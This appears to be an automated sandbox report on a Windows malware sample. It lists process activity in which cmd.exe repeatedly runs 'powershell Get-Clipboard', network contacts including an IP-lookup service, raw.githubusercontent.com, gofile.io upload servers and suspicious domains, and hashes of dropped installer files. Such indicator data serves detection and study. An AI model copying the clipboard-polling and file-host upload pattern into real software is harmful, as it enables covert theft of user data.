C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nova-screen-webview.com | udp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 8.8.8.8:53 | 107.218.67.172.in-addr.arpa | udp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nova-sentinel.com | udp |
| IT | 185.196.9.89:443 | nova-sentinel.com | tcp |
| US | 8.8.8.8:53 | 89.9.196.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | store9.gofile.io | udp |
| US | 206.168.190.239:443 | store9.gofile.io | tcp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.190.168.206.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ieatpoop.info | udp |
| US | 8.8.8.8:53 | github.com | udp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.9.196.185.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| IT | 185.196.9.89:443 | nova-sentinel.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | store1.gofile.io | udp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| US | 8.8.8.8:53 | 227.123.112.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\System.dll
| MD5 | 0d7ad4f45dc6f5aa87f606d0331c6901 |
| SHA1 | 48df0911f0484cbe2a8cdd5362140b63c41ee457 |
| SHA256 | 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca |
| SHA512 | c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9 |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\nsis7z.dll
| MD5 | 80e44ce4895304c6a3a831310fbf8cd0 |
| SHA1 | 36bd49ae21c460be5753a904b4501f1abca53508 |
| SHA256 | b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592 |
| SHA512 | c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df |
C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\chrome_100_percent.pak
| MD5 | a0e681fdd4613e0fff6fb8bf33a00ef1 |
| SHA1 | 6789bacfe0b244ab6872bd3acc1e92030276011e |
| SHA256 | 86f6b8ffa8788603a433d425a4bc3c4031e5d394762fd53257b0d4b1cfb2ffa2 |
| SHA512 | 6f6a1a8bfe3d33f3fa5f6134dac7cd8c017e38e5e2a75a93a958addbb17a601c5707d99a2af67e52c0a3d5206142209703701cd3fab44e0323a4553caee86196 |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\chrome_200_percent.pak
| MD5 | c37bd7a6b677a37313b7ecc4ff01b6f5 |
| SHA1 | 79db970c44347bd3566cefb6cabd1995e8e173df |
| SHA256 | 8c1ae81d19fd6323a02eb460e075e2f25aba322bc7d46f2e6edb1c4600e6537a |
| SHA512 | a7b07133fa05593b102a0e5e5788b29488cb74656c5ee25de897c2ba2b2a7b05c0663ade74a003f7d6df2134d0b75f0ad25e15e9c9e0969e9453b7fc40b9f8bb |
